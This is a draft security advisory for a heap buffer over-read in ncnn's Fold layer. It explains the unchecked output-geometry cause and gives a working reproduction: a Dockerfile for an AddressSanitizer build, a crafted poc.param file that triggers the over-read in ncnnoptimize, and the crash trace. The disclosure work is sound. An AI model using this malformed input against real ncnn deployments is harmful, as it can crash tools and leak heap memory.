All advisories
Draft

Heap Buffer Over-Read in Fold Shape Inference

Tencent/ncnn

Affected packages

ncnn other
Affected versions= 5e66f094bf7c597b4569cc014a8be84104748678
Patched versionsNot specified

Description

Heap Buffer Over-Read in Fold Shape Inference

Affected commit: 5e66f094bf7c597b4569cc014a8be84104748678
Sink: src/layer/fold.cpp:84 in Fold::forward
Sanitizer verdict: heap-buffer-overflow

Summary

Fold derives the number of input columns it will consume from its own attacker-controlled output geometry rather than from the actual input tensor, so a .param file that declares a large output_w against a tiny input makes the col2im loop walk hundreds of floats past the input allocation. An attacker who can get tools/ncnnoptimize to process the file — no binary weights are needed, the PoC passes null as the model — terminates the optimizer during ModelWriter::shape_inference() and, on a non-instrumented build, accumulates adjacent heap data into the output tensor.

Detail

The untrusted fields are Fold parameter keys 20 and 21 (output_w / output_h) together with the kernel, stride, dilation and pad keys, all read verbatim in Fold::load_param. Fold::forward computes the output extent from those values and then back-computes how many input columns and rows it should read, with a comment acknowledging that the relationship is merely assumed:

// src/layer/fold.cpp:39
    const int outw = output_w + pad_left + pad_right;
    const int outh = output_h + pad_top + pad_bottom;

    const int inw = (outw - kernel_extent_w) / stride_w + 1;
    const int inh = (outh - kernel_extent_h) / stride_h + 1;

    // assert inw * inh == size

// src/layer/fold.cpp:80
                for (int i = 0; i < inh; i++)
                {
                    for (int j = 0; j < inw; j++)
                    {
                        ptr[0] += sptr[0];

                        ptr += stride_w;
                        sptr += 1;
                    }

The assertion is never enforced. sptr is bottom_blob.row(p * maxk) — a pointer into the real input allocation — but the loop trip count inw * inh comes from the forged output geometry, so the two are unrelated.

The PoC's Input input 0 1 data 0=1 1=1 produces a 1x1 tensor: Mat::create(1, 1) at tools/modelwriter.h:389, whose backing block is the 84-byte region in the ASan report (4 usable bytes, cstep padding to 16, a 4-byte refcount, and the 64-byte NCNN_MALLOC_OVERREAD pad). The Fold layer declares 1=1 11=1 (1x1 kernel), unit strides and dilations, zero pads, 20=100 21=1. That gives outw = 100, kernel_extent_w = 1, and inw = (100 - 1) / 1 + 1 = 100, with inh = 1 and channels = 1. The inner loop therefore advances sptr 100 times over a buffer holding one float. Iterations 1 through 20 read the padding and refcount inside the block; at j == 21 the read is at byte offset 84 — exactly 0 bytes after the region — and AddressSanitizer aborts. Larger output_w values scale the over-read arbitrarily.

Reproduce

Build and run (writes the Dockerfile, builds ncnn with ASan, runs the PoC)
mkdir -p ncnn-poc-heap-buffer-over-read-in-fold-shape-inference && cd ncnn-poc-heap-buffer-over-read-in-fold-shape-inference

cat > Dockerfile <<'DOCKERFILE'
FROM ubuntu:24.04

RUN apt-get update && apt-get install -y --no-install-recommends \
      git ca-certificates g++ cmake make python3 python3-pip python3-numpy \
      protobuf-compiler libprotobuf-dev \
 && pip3 install --no-cache-dir --break-system-packages onnx protobuf \
 && rm -rf /var/lib/apt/lists/*

RUN git clone --depth 1 https://github.com/Tencent/ncnn.git /ncnn

WORKDIR /ncnn
RUN cmake -S . -B build \
      -DCMAKE_BUILD_TYPE=Debug \
      -DCMAKE_C_FLAGS="-O0 -g -fsanitize=address" \
      -DCMAKE_CXX_FLAGS="-O0 -g -fsanitize=address" \
      -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" \
      -DNCNN_BUILD_TOOLS=ON -DNCNN_BUILD_EXAMPLES=ON -DNCNN_BUILD_BENCHMARK=ON \
      -DNCNN_BUILD_TESTS=OFF -DNCNN_VULKAN=OFF -DNCNN_OPENMP=OFF \
 && cmake --build build -j"$(nproc)"

ENV ASAN_OPTIONS=detect_leaks=0
WORKDIR /poc
DOCKERFILE

cat > poc.param <<'PARAM'
7767517
2 2
Input data 0 1 data 0=1 1=1
Fold fold 1 1 data out 1=1 20=100
PARAM

docker build -t ncnn-asan .
docker run --rm --network none -v "$PWD:/poc" ncnn-asan \
  /ncnn/build/tools/ncnnoptimize poc.param null out.param out.bin 0

AddressSanitizer output:

shape_inference
=================================================================
==1==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x50e000000094 at pc 0x63b497278dc4 bp 0x7ffccb700010 sp 0x7ffccb700000
READ of size 4 at 0x50e000000094 thread T0
    #0 0x63b497278dc3 in ncnn::Fold::forward(ncnn::Mat const&, ncnn::Mat&, ncnn::Option const&) const /ncnn/src/layer/fold.cpp:84
    #1 0x63b48e681f2b in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:721
    #2 0x63b48e673b7f in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:167
    #3 0x63b48e6d39e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
    #4 0x63b48e5653c0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:435
    #5 0x63b48e5e2eee in main /ncnn/tools/ncnnoptimize.cpp:2844
    #6 0x7ef25982a1c9  (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #7 0x7ef25982a28a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #8 0x63b48e562624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)

0x50e000000094 is located 0 bytes after 84-byte region [0x50e000000040,0x50e000000094)
allocated by thread T0 here:
    #0 0x7ef259ea3f1d in posix_memalign ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
    #1 0x63b48e632a4f in fastMalloc /ncnn/src/allocator.h:62
    #2 0x63b48e632a4f in ncnn::Mat::create(int, int, unsigned long, ncnn::Allocator*) /ncnn/src/mat.cpp:373
    #3 0x63b48e563c6a in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:389
    #4 0x63b48e5e2eee in main /ncnn/tools/ncnnoptimize.cpp:2844
    #5 0x7ef25982a1c9  (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #6 0x7ef25982a28a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #7 0x63b48e562624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)

SUMMARY: AddressSanitizer: heap-buffer-overflow /ncnn/src/layer/fold.cpp:84 in ncnn::Fold::forward(ncnn::Mat const&, ncnn::Mat&, ncnn::Option const&) const

Credit

Zheng Yu @ DepthFirst